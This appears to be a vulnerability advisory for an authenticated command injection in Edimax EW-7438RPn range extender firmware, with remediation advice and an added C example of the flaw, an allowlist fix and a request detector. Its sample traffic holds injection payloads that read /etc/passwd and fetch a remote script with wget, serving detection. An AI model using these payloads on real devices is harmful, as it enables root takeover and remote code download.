CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
An OS command injection vulnerability exists in the Edimax EW-7438RPn firmware version 1.13 and prior via the mp.asp form handler. The /goform/mp endpoint improperly handles user-supplied input to the command parameter. An authenticated attacker can inject shell commands using shell metacharacters to achieve arbitrary command execution as the root user. Exploitation evidence was observed by the Shadowserver Foundation on 2024-09-14 UTC.
Analysis
CVE-2025-34024 is an OS command injection vulnerability in Edimax EW-7438RPn wireless range extender firmware 1.13 and prior. An attacker holding valid credentials for the web interface (PR:L in the vector above) who can reach the /goform/mp endpoint can execute arbitrary commands as root. The flaw is missing input validation on the 'command' parameter handled by mp.asp, which lets shell metacharacters pass through into command execution. The vector scores 8.8 (High) under CVSS 3.1: network-reachable, low attack complexity, no user interaction, and full loss of confidentiality, integrity and availability of the device. The Shadowserver Foundation observed exploitation on 2024-09-14 UTC, so this is in active use rather than theoretical.
Technical Context
The vulnerability exists in the web-based management interface of the Edimax EW-7438RPn (CPE: cpe:2.3:o:edimax:ew-7438rpn_firmware:*:*:*:*:*:*:*:*), specifically in the mp.asp form handler serving the /goform/mp endpoint. The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection'): user-supplied input to the 'command' parameter is built into a command line and handed to a shell without neutralizing metacharacters such as |, ;, &, $(), backticks and newlines. In C-based firmware this typically means a system() or popen() call, both of which pass the string to /bin/sh -c, so a single metacharacter in the parameter terminates the intended command and starts an attacker-chosen one. Because the embedded web server on this device runs as root, the injected command inherits root privileges. The fix pattern is to validate the parameter against a strict allowlist and to invoke the target program directly with an argv array (execve or equivalent) instead of through a shell; escaping metacharacters on its own is fragile and easy to get wrong.
Affected Products
Product: Edimax EW-7438RPn Wireless Range Extender; Affected Versions: Firmware 1.13 and all prior versions; CPE: cpe:2.3:o:edimax:ew-7438rpn_firmware:*:*:*:*:*:*:*:* (all versions up to and including 1.13); Vulnerable Component: /goform/mp endpoint (mp.asp form handler); Attack Surface: Web-based management interface accessible via HTTP/HTTPS on the device (typically port 80/443). No vendor advisory or official patch reference was provided in the source data; users should check Edimax support portal (support.edimax.com) for firmware updates beyond version 1.13.
Remediation
Immediate Actions: (1) If firmware version 1.13 or earlier is in use, check the Edimax support page (https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/wireless_range_extender/ew-7438rpn) for a firmware release newer than 1.13 and apply it; if Edimax publishes no fix, treat the device as unpatchable and plan its replacement. (2) Until fixed firmware is installed, restrict access to the web management interface by network segmentation (firewall rules allowing only trusted administrative hosts), disable remote/WAN management if not required, and replace default credentials with strong, unique ones; the vector is PR:L, so an attacker needs a valid login and credential hygiene directly reduces exposure. (3) Monitor requests to the /goform/mp endpoint for shell metacharacters (|, ;, &, $, backtick, newline) in the 'command' parameter, matching on the URL-decoded value rather than the raw one; this is only possible where traffic is plain HTTP or passes through a TLS-terminating proxy. (4) Where the interface is fronted by a reverse proxy, add a WAF rule that blocks, rather than strips, requests to /goform/mp whose decoded 'command' parameter contains metacharacters; stripping leaves the unsafe command construction in the handler in place and is bypassable with alternative encodings. Consumer firmware offers no way to disable a single form handler, so the endpoint cannot be turned off independently of the management interface. Long-term: upgrade to fixed firmware when Edimax releases it, and audit other Edimax devices for the same command injection pattern.
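The following C block is an added example, not Edimax firmware code or anything published on this page. It models the CWE-78 pattern described under Technical Context (a decoded 'command' value spliced into a shell command line) beside a hardened allowlist check, and the /goform/mp monitoring rule from Remediation run over constructed sample requests. The "mp %s" command template, the allowed subcommands, the "METHOD PATH BODY" record format and the sample traffic are all assumptions; the real handler's internals are not published here.

```c
/* Added example, not Edimax code: the CWE-78 pattern from Technical Context and
 * the /goform/mp metacharacter check from Remediation. Handler shape, command
 * template, allowlist and sample traffic are constructed assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SHELL_META "|;&$`<>()\n\r"

/* Percent-decode `len` bytes of an x-www-form-urlencoded value into out. */
static void url_decode(const char *in, size_t len, char *out, size_t n) {
    size_t o = 0;
    for (size_t i = 0; i < len && o + 1 < n; i++) {
        if (in[i] == '%' && i + 2 < len && isxdigit((unsigned char)in[i + 1]) &&
            isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            out[o++] = (in[i] == '+') ? ' ' : in[i]; /* '+' encodes a space */
        }
    }
    out[o] = '\0';
}

/* Copy the decoded value of `key` from a form body into out; 0 if absent. */
static int form_param(const char *body, const char *key, char *out, size_t n) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1, *e = strchr(v, '&');
            url_decode(v, e ? (size_t)(e - v) : strlen(v), out, n);
            return 1;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return 0;
}

/* VULNERABLE (CWE-78): the decoded parameter is spliced into a shell command
 * line. Returns the string system() would receive instead of executing it.
 * "mp %s" is a placeholder; the handler's real command line is not on this page. */
static const char *vulnerable_cmd_for(const char *body) {
    static char cmd[512];
    char value[256];
    if (!form_param(body, "command", value, sizeof value)) return NULL;
    snprintf(cmd, sizeof cmd, "mp %s", value); /* real handler: system(cmd), as root */
    return cmd;
}

/* Hardened check: no metacharacters, a tight character set, and an explicit
 * allowlist. Safer still: drop the shell and execve() a fixed binary with argv[]. */
static int accept_command_value(const char *value) {
    static const char *allowed[] = { "start", "stop", "status" }; /* assumed set */
    if (value[0] == '\0' || strpbrk(value, SHELL_META)) return 0;
    for (const char *c = value; *c; c++)
        if (!isalnum((unsigned char)*c) && *c != '_' && *c != '-') return 0;
    for (size_t i = 0; i < sizeof allowed / sizeof *allowed; i++)
        if (strcmp(value, allowed[i]) == 0) return 1;
    return 0;
}

/* Detection rule: flag a "METHOD PATH BODY" record (stand-in for a proxy or IDS
 * log line) when the path is /goform/mp and the decoded `command` value carries
 * a shell metacharacter. Percent-encoded payloads are decoded before matching. */
static int flag_request(const char *record) {
    char method[8], path[64], body[512], value[256];
    if (sscanf(record, "%7s %63s %511s", method, path, body) != 3) return 0;
    if (strcmp(path, "/goform/mp") != 0) return 0;
    if (!form_param(body, "command", value, sizeof value)) return 0;
    return strpbrk(value, SHELL_META) != NULL;
}

/* Constructed sample traffic: benign, two injection attempts, one off-path. */
static const char *SAMPLE_RECORDS[] = {
    "POST /goform/mp command=status",
    "POST /goform/mp command=status%3Bcat+/etc/passwd",
    "POST /goform/mp command=x%60wget+http://198.51.100.7/s.sh%60",
    "POST /goform/wizard command=status%26id",
};

static int count_flagged(void) {
    int hits = 0;
    for (size_t i = 0; i < sizeof SAMPLE_RECORDS / sizeof *SAMPLE_RECORDS; i++)
        hits += flag_request(SAMPLE_RECORDS[i]);
    return hits;
}

int main(void) {
    printf("vulnerable handler would run: %s\n", vulnerable_cmd_for("command=status%3Bid"));
    printf("accept \"status\": %d, accept \"status;id\": %d\n",
           accept_command_value("status"), accept_command_value("status;id"));
    printf("flagged requests in sample traffic: %d\n", count_flagged());
    return 0;
}
```

The vulnerable builder returns the command string instead of calling system(), so the program is safe to run while still showing exactly what the shell would receive. The detector decodes percent-encoding before matching, which is the step a naive pattern match on raw request parameters misses; an attacker who sends `%3B` instead of `;` would otherwise slip past the rule.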
EUVD-2025-18776